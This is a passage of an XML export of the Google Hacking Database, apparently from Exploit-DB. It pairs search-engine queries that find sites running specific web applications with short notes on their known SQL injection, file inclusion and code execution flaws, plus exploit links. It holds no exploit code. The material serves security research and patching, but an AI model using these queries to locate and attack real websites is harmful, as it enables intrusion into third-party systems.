<textualDescription>CzarNews 1.14 (tpath) Remote File Inclusion Vulnerability - CVE: 2006-3685: https://www.exploit-db.com/exploits/2009</textualDescription>
<query>&quot;CzarNews v1.12 &quot; | &quot;CzarNews v1.13&quot; | &quot;CzarNews v1.14 &quot;</query>
<querystring>https://www.google.com/search?q=%22CzarNews+v1.12+%22+|+%22CzarNews+v1.13%22+|+%22CzarNews+v1.14+%22</querystring>
<edb>https://www.exploit-db.com/exploits/2009</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2701</id>
<link>https://www.exploit-db.com/ghdb/2701</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;DeeEmm CMS&quot;</shortDescription>
<textualDescription>DeeEmm CMS (DMCMS) 0.7.4 Multiple Remote Vulnerabilities - CVE: 2008-3721: https://www.exploit-db.com/exploits/6250</textualDescription>
<query>&quot;DeeEmm CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22DeeEmm+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/6250</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>875</id>
<link>https://www.exploit-db.com/ghdb/875</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;delete entries&quot; inurl:admin/delete.asp</shortDescription>
<textualDescription>As described in OSVDB article #13715:&quot;AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.&quot;The company supporting this software is no longer in business and the software is no longer being updated. Therefore, versions should not matter in this dork.</textualDescription>
<query>&quot;delete entries&quot; inurl:admin/delete.asp</query>
<querystring>https://www.google.com/search?q=%22delete+entries%22+inurl%3Aadmin%2Fdelete.asp</querystring>
<edb></edb>
<date>2005-02-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>2577</id>
<link>https://www.exploit-db.com/ghdb/2577</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Desenvolvido por WeBProdZ&quot;</shortDescription>
<textualDescription>WeBProdZ CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12522</textualDescription>
<query>&quot;Desenvolvido por WeBProdZ&quot;</query>
<querystring>https://www.google.com/search?q=%22Desenvolvido+por+WeBProdZ%22</querystring>
<edb>https://www.exploit-db.com/exploits/12522</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3223</id>
<link>https://www.exploit-db.com/ghdb/3223</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Desenvolvido por: Fio Mental&quot;</shortDescription>
<textualDescription>Fiomental &amp; Coolsis Backoffice Multi Vulnerability: https://www.exploit-db.com/exploits/12563</textualDescription>
<query>&quot;Desenvolvido por: Fio Mental&quot;</query>
<querystring>https://www.google.com/search?q=%22Desenvolvido+por:+Fio+Mental%22</querystring>
<edb>https://www.exploit-db.com/exploits/12563</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2156</id>
<link>https://www.exploit-db.com/ghdb/2156</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Designed &amp; Developed by N.E.T E-Commerce Group. All Rights Reserved.&quot;</shortDescription>
<textualDescription>IranMC Arad Center (news.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6712</textualDescription>
<query>&quot;Designed &amp; Developed by N.E.T E-Commerce Group. All Rights Reserved.&quot;</query>
<querystring>https://www.google.com/search?q=%22Designed+%26+Developed+by+N.E.T+E-Commerce+Group.+All+Rights+Reserved.%22</querystring>
<edb>https://www.exploit-db.com/exploits/6712</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2457</id>
<link>https://www.exploit-db.com/ghdb/2457</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Designed &amp; Developed by net-finity&quot;</shortDescription>
<textualDescription>net-finity (links.php) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/4629</textualDescription>
<query>&quot;Designed &amp; Developed by net-finity&quot;</query>
<querystring>https://www.google.com/search?q=%22Designed+%26+Developed+by+net-finity%22</querystring>
<edb>https://www.exploit-db.com/exploits/4629</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2721</id>
<link>https://www.exploit-db.com/ghdb/2721</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Designed &amp; Developed by Zeeways.com&quot;</shortDescription>
<textualDescription>zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6915: https://www.exploit-db.com/exploits/7058</textualDescription>
<query>&quot;Designed &amp; Developed by Zeeways.com&quot;</query>
<querystring>https://www.google.com/search?q=%22Designed+%26+Developed+by+Zeeways.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/7058</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1606</id>
<link>https://www.exploit-db.com/ghdb/1606</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Designed and Developed by Debliteck Ltd&quot;</shortDescription>
<textualDescription>DB[CMS] Sql Injection Vulnerability: https://www.exploit-db.com/exploits/12654</textualDescription>
<query>&quot;Designed and Developed by Debliteck Ltd&quot;</query>
<querystring>https://www.google.com/search?q=%22Designed+and+Developed+by+Debliteck+Ltd%22</querystring>
<edb>https://www.exploit-db.com/exploits/12654</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1608</id>
<link>https://www.exploit-db.com/ghdb/1608</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Designed and Developed by Debliteck Ltd&quot;</shortDescription>
<textualDescription>DB[CMS] (section.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12659</textualDescription>
<query>&quot;Designed and Developed by Debliteck Ltd&quot;</query>
<querystring>https://www.google.com/search?q=%22Designed+and+Developed+by+Debliteck+Ltd%22</querystring>
<edb>https://www.exploit-db.com/exploits/12659</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1639</id>
<link>https://www.exploit-db.com/ghdb/1639</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Designed and Developed by Debliteck Ltd&quot;</shortDescription>
<textualDescription>DB[CMS] (article.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12666</textualDescription>
<query>&quot;Designed and Developed by Debliteck Ltd&quot;</query>
<querystring>https://www.google.com/search?q=%22Designed+and+Developed+by+Debliteck+Ltd%22</querystring>
<edb>https://www.exploit-db.com/exploits/12666</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3010</id>
<link>https://www.exploit-db.com/ghdb/3010</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Designed and powered by AWS Sports&quot;</shortDescription>
<textualDescription>Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14645</textualDescription>
<query>&quot;Designed and powered by AWS Sports&quot;</query>
<querystring>https://www.google.com/search?q=%22Designed+and+powered+by+AWS+Sports%22</querystring>
<edb>https://www.exploit-db.com/exploits/14645</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2088</id>
<link>https://www.exploit-db.com/ghdb/2088</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Designed by Spaceacre&quot;</shortDescription>
<textualDescription>Spaceacre Multiple SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12551</textualDescription>
<query>&quot;Designed by Spaceacre&quot;</query>
<querystring>https://www.google.com/search?q=%22Designed+by+Spaceacre%22</querystring>
<edb>https://www.exploit-db.com/exploits/12551</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3109</id>
<link>https://www.exploit-db.com/ghdb/3109</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Devana is an open source project !&quot;</shortDescription>
<textualDescription>Devana SQL Injection vulnerability - CVE: 2010-2673: https://www.exploit-db.com/exploits/11922</textualDescription>
<query>&quot;Devana is an open source project !&quot;</query>
<querystring>https://www.google.com/search?q=%22Devana+is+an+open+source+project+!%22</querystring>
<edb>https://www.exploit-db.com/exploits/11922</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2625</id>
<link>https://www.exploit-db.com/ghdb/2625</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Developed by Bispage.com&quot;</shortDescription>
<textualDescription>bispage Bypass Vulnerability: https://www.exploit-db.com/exploits/11555</textualDescription>
<query>&quot;Developed by Bispage.com&quot;</query>
<querystring>https://www.google.com/search?q=%22Developed+by+Bispage.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/11555</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2978</id>
<link>https://www.exploit-db.com/ghdb/2978</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Developed by Infoware Solutions&quot;</shortDescription>
<textualDescription>infoware SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12714</textualDescription>
<query>&quot;Developed by Infoware Solutions&quot;</query>
<querystring>https://www.google.com/search?q=%22Developed+by+Infoware+Solutions%22</querystring>
<edb>https://www.exploit-db.com/exploits/12714</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2859</id>
<link>https://www.exploit-db.com/ghdb/2859</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Developed by Infoware Solutions&quot;</shortDescription>
<textualDescription>My PHP Dating (success_story.php id) SQL Injection Vulnerability - CVE: 2008-4705: https://www.exploit-db.com/exploits/6754</textualDescription>
<query>&quot;Developed by Infoware Solutions&quot;</query>
<querystring>https://www.google.com/search?q=%22Developed+by+Infoware+Solutions%22</querystring>
<edb>https://www.exploit-db.com/exploits/6754</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2203</id>
<link>https://www.exploit-db.com/ghdb/2203</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Developed by Quate.net.&quot;</shortDescription>
<textualDescription>Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability - CVE: 2008-1963: https://www.exploit-db.com/exploits/5463</textualDescription>
<query>&quot;Developed by Quate.net.&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Developed+by+Quate.net.%22</querystring>
<edb>https://www.exploit-db.com/exploits/5463</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3335</id>
<link>https://www.exploit-db.com/ghdb/3335</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Developed by rbk&quot; </shortDescription>
<textualDescription>InfiniX 1.2.003 Multiple SQL Injection Vulnerabilities - CVE: 2009-2451: https://www.exploit-db.com/exploits/8558</textualDescription>
<query>&quot;Developed by rbk&quot;</query>
<querystring>https://www.google.com/search?q=%22Developed+by+rbk%22</querystring>
<edb>https://www.exploit-db.com/exploits/8558</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1780</id>
<link>https://www.exploit-db.com/ghdb/1780</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Diseño Web Hernest Consulting S.L.&quot;</shortDescription>
<textualDescription>Administrador de Contenidos Admin Login Bypass vulnerability: https://www.exploit-db.com/exploits/12527</textualDescription>
<query>&quot;Diseño Web Hernest Consulting S.L.&quot;</query>
<querystring>https://www.google.com/search?q=%22Dise%C3%B1o+Web+Hernest+Consulting+S.L.%22</querystring>
<edb>https://www.exploit-db.com/exploits/12527</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3359</id>
<link>https://www.exploit-db.com/ghdb/3359</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;download this free gallery at matteobinda.com&quot;</shortDescription>
<textualDescription>ASP Photo Gallery 1.0 Multiple SQL Injection Vulnerabilities - CVE: 2008-0256: https://www.exploit-db.com/exploits/4900</textualDescription>
<query>&quot;download this free gallery at matteobinda.com&quot;</query>
<querystring>https://www.google.com/search?q=%22download+this+free+gallery+at+matteobinda.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/4900</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3376</id>
<link>https://www.exploit-db.com/ghdb/3376</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Driven by DokuWiki&quot;</shortDescription>
<textualDescription>DokuWiki 2006-03-09b (dwpage.php) System Disclosure: https://www.exploit-db.com/exploits/2322</textualDescription>
<query>&quot;Driven by DokuWiki&quot;</query>
<querystring>https://www.google.com/search?q=%22Driven+by+DokuWiki%22</querystring>
<edb>https://www.exploit-db.com/exploits/2322</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3486</id>
<link>https://www.exploit-db.com/ghdb/3486</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Driven by DokuWiki&quot;</shortDescription>
<textualDescription>DokuWiki 2006-03-09b (dwpage.php) Remote Code Execution: https://www.exploit-db.com/exploits/2321</textualDescription>
<query>&quot;Driven by DokuWiki&quot;</query>
<querystring>https://www.google.com/search?q=%22Driven+by+DokuWiki%22</querystring>
<edb>https://www.exploit-db.com/exploits/2321</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>675</id>
<link>https://www.exploit-db.com/ghdb/675</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;driven by: ASP Message Board&quot;</shortDescription>
<textualDescription>Multiple unspecified vulnerabilities reportedly affect the Infusium ASP Message Board. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. vulnerable Infuseum ASP Message Board 2.2.1 cAdding the 2.2.1c seems to filter out some good positives, so I left it out.</textualDescription>
<query>&quot;driven by: ASP Message Board&quot;</query>
<querystring>https://www.google.com/search?q=%22driven+by%3A+ASP+Message+Board%22</querystring>
<edb></edb>
<date>2004-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1700</id>
<link>https://www.exploit-db.com/ghdb/1700</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Easy-Clanpage v2.2&quot;</shortDescription>
<textualDescription>Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability - CVE: 2008-1425: https://www.exploit-db.com/exploits/5275</textualDescription>
<query>&quot;Easy-Clanpage v2.2&quot;</query>
<querystring>https://www.google.com/search?q=%22Easy-Clanpage+v2.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/5275</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2910</id>
<link>https://www.exploit-db.com/ghdb/2910</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;eCommerce Engine © 2006 xt:Commerce Shopsoftware&quot;</shortDescription>
<textualDescription>xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/15455</textualDescription>
<query>&quot;eCommerce Engine © 2006 xt:Commerce Shopsoftware&quot;</query>
<querystring>https://www.google.com/search?q=%22eCommerce+Engine+%C2%A9+2006+xt%3ACommerce+Shopsoftware%22</querystring>
<edb>https://www.exploit-db.com/exploits/15455</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2454</id>
<link>https://www.exploit-db.com/ghdb/2454</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Emanuele Guadagnoli&quot; &quot;CcMail&quot;</shortDescription>
<textualDescription>CcMail</textualDescription>
<query>&quot;Emanuele Guadagnoli&quot; &quot;CcMail&quot;</query>
<querystring>https://www.google.com/search?q=%22Emanuele+Guadagnoli%22+%22CcMail%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1919</id>
<link>https://www.exploit-db.com/ghdb/1919</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Emefa Guestbook V 3.0&quot;</shortDescription>
<textualDescription>Emefa Guestbook 3.0 Remote Database Disclosure Vulnerability - CVE: 2008-5852: https://www.exploit-db.com/exploits/7534</textualDescription>
<query>&quot;Emefa Guestbook V 3.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Emefa+Guestbook+V+3.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/7534</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>627</id>
<link>https://www.exploit-db.com/ghdb/627</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Enter ip&quot; inurl:&quot;php-ping.php&quot;</shortDescription>
<textualDescription>It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shellmetacharacters via the 'count' parameter of php-ping.php script.report: http://www.securityfocus.com/bid/9309/info/sample: http://img64.exs.cx/my.php?loc=img64&amp;image=phpping.jpg</textualDescription>
<query>&quot;Enter ip&quot; inurl:&quot;php-ping.php&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22Enter+ip%22+inurl%3A%22php-ping.php%22</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>3714</id>
<link>https://www.exploit-db.com/ghdb/3714</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;error_log&quot; inurl:/wp-content</shortDescription>
<textualDescription>Find various www readable Wordpress directories containing error logs with
server side debugging info, such as home path directory names, which are
often the same user names for logging into the server over FTP and SSH.
This often exposes the path of the plug-ins installed in wordpress as well,
giving someone more information and avenues of attack since many Wordpress
plug-ins can lead to compromises of the sites security. - DigiP
</textualDescription>
<query>&quot;error_log&quot; inurl:/wp-content</query>
<querystring>https://www.google.com/search?q=&quot;error_log&quot; inurl:/wp-content</querystring>
<edb></edb>
<date>2011-08-25</date>
<author>DigiP</author>
</entry>
<entry>
<id>2371</id>
<link>https://www.exploit-db.com/ghdb/2371</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Everyone should be on TV! Now you can upload 2 TV&quot;</shortDescription>
<textualDescription>Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability - CVE: 2008-3419: https://www.exploit-db.com/exploits/6147</textualDescription>
<query>&quot;Everyone should be on TV! Now you can upload 2 TV&quot;</query>
<querystring>https://www.google.com/search?q=%22Everyone+should+be+on+TV!+Now+you+can+upload+2+TV%22</querystring>
<edb>https://www.exploit-db.com/exploits/6147</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2236</id>
<link>https://www.exploit-db.com/ghdb/2236</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Eyeland Studio Inc. All Rights Reserved.&quot;</shortDescription>
<textualDescription>Eyeland Studio Inc. SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13855</textualDescription>
<query>&quot;Eyeland Studio Inc. All Rights Reserved.&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Eyeland+Studio+Inc.+All+Rights+Reserved.%22</querystring>
<edb>https://www.exploit-db.com/exploits/13855</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1658</id>
<link>https://www.exploit-db.com/ghdb/1658</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Eyeland Studio Inc. All Rights Reserved.&quot; inurl:game.php</shortDescription>
<textualDescription>Eyeland Studio Inc. (game.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13858</textualDescription>
<query>&quot;Eyeland Studio Inc. All Rights Reserved.&quot; inurl:game.php</query>
<querystring>https://www.google.com/search?q=%22Eyeland+Studio+Inc.+All+Rights+Reserved.%22+inurl:game.php</querystring>
<edb>https://www.exploit-db.com/exploits/13858</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2175</id>
<link>https://www.exploit-db.com/ghdb/2175</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Factux le facturier libre V 1.1.5&quot;</shortDescription>
<textualDescription>Factux LFI Vulnerability: https://www.exploit-db.com/exploits/12521</textualDescription>
<query>&quot;Factux le facturier libre V 1.1.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Factux+le+facturier+libre+V+1.1.5%22</querystring>
<edb>https://www.exploit-db.com/exploits/12521</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3494</id>
<link>https://www.exploit-db.com/ghdb/3494</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;FlatNuke&quot; &quot;Valid HTML 4.01!&quot; &quot;Valid CSS!&quot; &quot;Get RSS 2.0 Feed&quot; &quot;Get RSS</shortDescription>
<textualDescription>Flatnuke 2.5.8 file() Priv Escalation / Code Execution: https://www.exploit-db.com/exploits/2498</textualDescription>
<query>&quot;FlatNuke&quot; &quot;Valid HTML 4.01!&quot; &quot;Valid CSS!&quot; &quot;Get RSS 2.0 Feed&quot; &quot;Get RSS</query>
<querystring>https://www.google.com/search?q=%22FlatNuke%22+%22Valid+HTML+4.01!%22+%22Valid+CSS!%22+%22Get+RSS+2.0+Feed%22+%22Get+RSS</querystring>
<edb>https://www.exploit-db.com/exploits/2498</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3503</id>
<link>https://www.exploit-db.com/ghdb/3503</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;FlatNuke&quot; &quot;Valid HTML 4.01!&quot; &quot;Valid CSS!&quot; &quot;Get RSS 2.0 Feed&quot; &quot;Get RSS</shortDescription>
<textualDescription>Flatnuke 2.5.8 (userlang) Local Inclusion / Delete All Users: https://www.exploit-db.com/exploits/2499</textualDescription>
<query>&quot;FlatNuke&quot; &quot;Valid HTML 4.01!&quot; &quot;Valid CSS!&quot; &quot;Get RSS 2.0 Feed&quot; &quot;Get RSS</query>
<querystring>https://www.google.com/search?q=%22FlatNuke%22+%22Valid+HTML+4.01!%22+%22Valid+CSS!%22+%22Get+RSS+2.0+Feed%22+%22Get+RSS</querystring>
<edb>https://www.exploit-db.com/exploits/2499</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2873</id>
<link>https://www.exploit-db.com/ghdb/2873</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Forum Active Bulletin Board version 1.1 béta 2&quot;</shortDescription>
<textualDescription>Active Bulletin Board</textualDescription>
<query>&quot;Forum Active Bulletin Board version 1.1 béta 2&quot;</query>
<querystring>https://www.google.com/search?q=%22Forum+Active+Bulletin+Board+version+1.1+b%C3%A9ta+2%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3089</id>
<link>https://www.exploit-db.com/ghdb/3089</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;FrontAccounting&quot;</shortDescription>
<textualDescription>FrontAccounting 1.13 Remote File Inclusion Vulnerabilities - CVE: 2007-5117: https://www.exploit-db.com/exploits/4456</textualDescription>
<query>&quot;FrontAccounting&quot;</query>
<querystring>https://www.google.com/search?q=%22FrontAccounting%22</querystring>
<edb>https://www.exploit-db.com/exploits/4456</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3422</id>
<link>https://www.exploit-db.com/ghdb/3422</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Galerie 3.2 © 2004 by progressive&quot;</shortDescription>
<textualDescription>Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection - CVE: 2008-4516: https://www.exploit-db.com/exploits/6675</textualDescription>
<query>&quot;Galerie 3.2 © 2004 by progressive&quot;</query>
<querystring>https://www.google.com/search?q=%22Galerie+3.2+%C3%82%C2%A9+2004+by+progressive%22</querystring>
<edb>https://www.exploit-db.com/exploits/6675</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2237</id>
<link>https://www.exploit-db.com/ghdb/2237</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Gallery powered by fMoblog&quot;</shortDescription>
<textualDescription>Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability - CVE: 2009-0968: https://www.exploit-db.com/exploits/8229</textualDescription>
<query>&quot;Gallery powered by fMoblog&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Gallery+powered+by+fMoblog%22</querystring>
<edb>https://www.exploit-db.com/exploits/8229</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4066</id>
<link>https://www.exploit-db.com/ghdb/4066</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;ganglia mobile.php&quot;</shortDescription>
<textualDescription>EDB: https://www.exploit-db.com/exploits/38030/
CVE: CVE-2012-3448
Also:
intitle:&quot;Ganglia Mobile&quot;
intitle:&quot;Ganglia&quot; inurl:&quot;mobile.php&quot;
intitle:&quot;Grid Report&quot; OR intitle:&quot;Cluster Report&quot; OR intitle:&quot;Node View&quot; OR intitle:&quot;Host Report&quot; OR intitle:&quot;Ganglia:: &quot;
intitle:&quot;Powered by Job Monarch&quot;
intext:&quot;Job Monarch version &quot;
intext:&quot;Jobarchive&quot; intext:&quot;runningtime&quot;
inurl:&quot;/addons/job_monarch&quot; -oss.trac.surfsara.nl
&quot;Ganglia Web Frontend version 3.5.0&quot; - Comment: just tweak the version 3.5.0 to any valid Ganglia Web Frontend version to get results targeted to a specific version.</textualDescription>
<query>&quot;ganglia mobile.php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;ganglia mobile.php&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/38030</edb>
<date>2015-09-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>3086</id>
<link>https://www.exploit-db.com/ghdb/3086</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;generated by Exhibit Engine 1.5 RC 4&quot;</shortDescription>
<textualDescription>Exhibit Engine 1.5 RC 4 (photo_comment.php) File Include - CVE: 2006-5292: https://www.exploit-db.com/exploits/2509</textualDescription>
<query>&quot;generated by Exhibit Engine 1.5 RC 4&quot;</query>
<querystring>https://www.google.com/search?q=%22generated+by+Exhibit+Engine+1.5+RC+4%22</querystring>
<edb>https://www.exploit-db.com/exploits/2509</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1871</id>
<link>https://www.exploit-db.com/ghdb/1871</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Généré par KDPics v1.18&quot;</shortDescription>
<textualDescription>Généré par KDPics v1.18 Remote Add Admin: https://www.exploit-db.com/exploits/11455</textualDescription>
<query>&quot;Généré par KDPics v1.18&quot;</query>
<querystring>https://www.google.com/search?q=%22G%C3%A9n%C3%A9r%C3%A9+par+KDPics+v1.18%22</querystring>
<edb>https://www.exploit-db.com/exploits/11455</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3452</id>
<link>https://www.exploit-db.com/ghdb/3452</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Help * Contact * Imprint * Sitemap&quot; | &quot;powered by papoo&quot; | &quot;powered by cms papoo&quot;</shortDescription>
<textualDescription>PAPOO 3_RC3 SQL Injection/Admin Credentials Disclosure - CVE: 2006-3571: https://www.exploit-db.com/exploits/1993</textualDescription>
<query>&quot;Help * Contact * Imprint * Sitemap&quot; | &quot;powered by papoo&quot; | &quot;powered by cms papoo&quot;</query>
<querystring>https://www.google.com/search?q=%22Help+*+Contact+*+Imprint+*+Sitemap%22+|+%22powered+by+papoo%22+|+%22powered+by+cms+papoo%22</querystring>
<edb>https://www.exploit-db.com/exploits/1993</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3463</id>
<link>https://www.exploit-db.com/ghdb/3463</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Help * Contact * Imprint * Sitemap&quot; | &quot;powered by papoo&quot; | &quot;powered by cms papoo&quot;</shortDescription>
<textualDescription>Papoo 3.02 (kontakt menuid) Remote SQL Injection - CVE: 2007-2320: https://www.exploit-db.com/exploits/3739</textualDescription>
<query>&quot;Help * Contact * Imprint * Sitemap&quot; | &quot;powered by papoo&quot; | &quot;powered by cms papoo&quot;</query>
<querystring>https://www.google.com/search?q=%22Help+*+Contact+*+Imprint+*+Sitemap%22+|+%22powered+by+papoo%22+|+%22powered+by+cms+papoo%22</querystring>
<edb>https://www.exploit-db.com/exploits/3739</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2133</id>
<link>https://www.exploit-db.com/ghdb/2133</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Help desk software by United Web Coders rev. 3.0.640&quot;</shortDescription>
<textualDescription>Trouble Ticket Software ttx.cgi Remote File Download: https://www.exploit-db.com/exploits/11823</textualDescription>
<query>&quot;Help desk software by United Web Coders rev. 3.0.640&quot;</query>
<querystring>https://www.google.com/search?q=%22Help+desk+software+by+United+Web+Coders+rev.+3.0.640%22</querystring>
<edb>https://www.exploit-db.com/exploits/11823</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2317</id>
<link>https://www.exploit-db.com/ghdb/2317</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;hlstats.php?mode=dailyawardinfo&amp;award=&quot; hlstatsx</shortDescription>
<textualDescription>HLstatsX v1.65 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10850</textualDescription>
<query>&quot;hlstats.php?mode=dailyawardinfo&amp;award=&quot; hlstatsx</query>
